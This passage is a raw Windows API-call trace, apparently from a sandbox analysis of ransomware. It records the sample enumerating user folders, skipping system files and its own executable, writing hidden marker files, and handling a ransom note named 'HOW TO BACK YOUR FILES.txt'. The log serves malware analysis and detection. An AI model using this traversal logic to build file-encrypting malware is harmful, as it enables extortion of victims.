(lpString1="All Users", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="Tiger4444.exe") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="bootmgr") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="pagefile.sys") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="boot") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="ids.txt") returned -1 [0044.731] lstrcmpiW (lpString1="All Users", lpString2="NTUSER.DAT") returned -1 [0044.731] lstrcpyW (in: lpString1=0x30aeaba, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0044.731] SetFileAttributesW (lpFileName="C:\\Users\\All Users", dwFileAttributes=0x2412) returned 1 [0044.731] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\All Users\r\n") returned 37 [0044.731] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\All Users\r\n") returned 37 [0044.731] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.732] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0044.732] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x25, lpOverlapped=0x0) returned 1 [0044.733] CloseHandle (hObject=0x260) returned 1 [0044.734] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.734] lstrcmpiW (lpString1="Default", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="Tiger4444.exe") returned -1 [0044.734] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="windows") returned -1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="bootmgr") returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="pagefile.sys") returned -1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="boot") returned 1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="ids.txt") returned -1 [0044.734] lstrcmpiW (lpString1="Default", lpString2="NTUSER.DAT") returned -1 [0044.734] lstrcpyW (in: lpString1=0x30aeaba, lpString2="Default" | out: lpString1="Default") returned="Default" [0044.734] SetFileAttributesW (lpFileName="C:\\Users\\Default", dwFileAttributes=0x12) returned 1 [0044.735] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665a0 [0044.735] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x22) returned 0xc7c1d8 [0044.735] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665a8 | out: ListHead=0xc66828, ListEntry=0xc665a8) returned 0xc66468 [0044.735] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="Tiger4444.exe") returned -1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2=".") returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="..") returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="windows") returned -1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="bootmgr") returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="pagefile.sys") returned -1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="boot") returned 1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="ids.txt") returned -1 [0044.735] lstrcmpiW (lpString1="Default User", lpString2="NTUSER.DAT") returned -1 [0044.735] lstrcpyW (in: lpString1=0x30aeaba, lpString2="Default User" | out: lpString1="Default User") returned="Default User" [0044.735] SetFileAttributesW (lpFileName="C:\\Users\\Default User", dwFileAttributes=0x2412) returned 1 [0044.735] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default User\r\n") returned 40 [0044.735] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default User\r\n") returned 40 [0044.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.735] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4a8 [0044.735] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x28, lpOverlapped=0x0) returned 1 [0044.737] CloseHandle (hObject=0x260) returned 1 [0044.738] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="Tiger4444.exe") returned -1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2=".") returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="..") returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="windows") returned -1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="bootmgr") returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="pagefile.sys") returned -1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="boot") returned 1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="ids.txt") returned -1 [0044.738] lstrcmpiW (lpString1="Default.migrated", lpString2="NTUSER.DAT") returned -1 [0044.738] lstrcpyW (in: lpString1=0x30aeaba, lpString2="Default.migrated" | out: lpString1="Default.migrated") returned="Default.migrated" [0044.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666e0 [0044.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x34) returned 0xc72d08 [0044.738] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666e8 | out: ListHead=0xc66828, ListEntry=0xc666e8) returned 0xc665a8 [0044.738] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.738] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.738] lstrcpyW (in: lpString1=0x30aeaba, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.738] SetFileAttributesW (lpFileName="C:\\Users\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.739] SetFileAttributesW (lpFileName="C:\\Users\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.739] lstrlenW (lpString="desktop.ini") returned 11 [0044.739] lstrlenW (lpString="Tiger4444") returned 9 [0044.739] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.739] lstrlenW (lpString=".dll") returned 4 [0044.739] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.739] lstrlenW (lpString=".lnk") returned 4 [0044.739] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.739] lstrlenW (lpString=".ini") returned 4 [0044.739] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.739] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="Tiger4444.exe") returned -1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2=".") returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="..") returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="windows") returned -1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="bootmgr") returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="pagefile.sys") returned -1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="boot") returned 1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="ids.txt") returned -1 [0044.739] lstrcmpiW (lpString1="FD1HVy", lpString2="NTUSER.DAT") returned -1 [0044.739] lstrcpyW (in: lpString1=0x30aeaba, lpString2="FD1HVy" | out: lpString1="FD1HVy") returned="FD1HVy" [0044.739] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0044.739] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x20) returned 0xc6f448 [0044.739] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc666e8 [0044.740] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="Tiger4444.exe") returned -1 [0044.740] lstrcmpiW (lpString1="Public", lpString2=".") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="..") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="windows") returned -1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="bootmgr") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="pagefile.sys") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="boot") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="ids.txt") returned 1 [0044.740] lstrcmpiW (lpString1="Public", lpString2="NTUSER.DAT") returned 1 [0044.740] lstrcpyW (in: lpString1=0x30aeaba, lpString2="Public" | out: lpString1="Public") returned="Public" [0044.740] SetFileAttributesW (lpFileName="C:\\Users\\Public", dwFileAttributes=0x10) returned 1 [0044.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0044.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x20) returned 0xc6f718 [0044.740] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc666a8 [0044.740] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0044.740] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0044.740] lstrcpyW (in: lpString1=0x30aeaba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.740] CreateFileW (lpFileName="C:\\Users\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.741] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.741] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.741] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.742] CloseHandle (hObject=0x260) returned 1 [0044.742] CloseHandle (hObject=0x2ac) returned 1 [0044.742] GetCurrentThreadId () returned 0xfa8 [0044.742] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0044.742] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public", iMaxLength=2048 | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0044.742] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f718 | out: hHeap=0xc50000) returned 1 [0044.742] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0044.742] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0044.742] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0044.742] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3" [0044.743] CreateFileW (lpFileName="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.744] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.746] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.748] SetFileAttributesW (lpFileName="C:\\Users\\Public\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.748] CloseHandle (hObject=0x2ac) returned 1 [0044.748] lstrlenW (lpString="C:\\Users\\Public") returned 15 [0044.748] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.748] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7faf34aa, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0044.749] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.749] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.749] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.749] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.749] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7faf34aa, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.749] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.749] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.749] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.749] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.749] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.749] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7faf34aa, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7faf34aa, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fb198cf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.749] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.749] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.749] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="Tiger4444.exe") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2=".") returned 1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="..") returned 1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="windows") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="bootmgr") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="pagefile.sys") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="boot") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="ids.txt") returned -1 [0044.749] lstrcmpiW (lpString1="AccountPictures", lpString2="NTUSER.DAT") returned -1 [0044.749] lstrcpyW (in: lpString1=0x30aeac8, lpString2="AccountPictures" | out: lpString1="AccountPictures") returned="AccountPictures" [0044.749] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures", dwFileAttributes=0x12) returned 1 [0044.749] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0044.749] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x40) returned 0xc828e0 [0044.749] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc666a8 [0044.749] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="Tiger4444.exe") returned -1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0044.750] lstrcmpiW (lpString1="Desktop", lpString2="NTUSER.DAT") returned -1 [0044.750] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0044.750] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop", dwFileAttributes=0x12) returned 1 [0044.750] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0044.750] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x30) returned 0xc678a8 [0044.750] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc66448 [0044.750] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.750] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.750] lstrcpyW (in: lpString1=0x30aeac8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.750] SetFileAttributesW (lpFileName="C:\\Users\\Public\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.751] SetFileAttributesW (lpFileName="C:\\Users\\Public\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.751] lstrlenW (lpString="desktop.ini") returned 11 [0044.751] lstrlenW 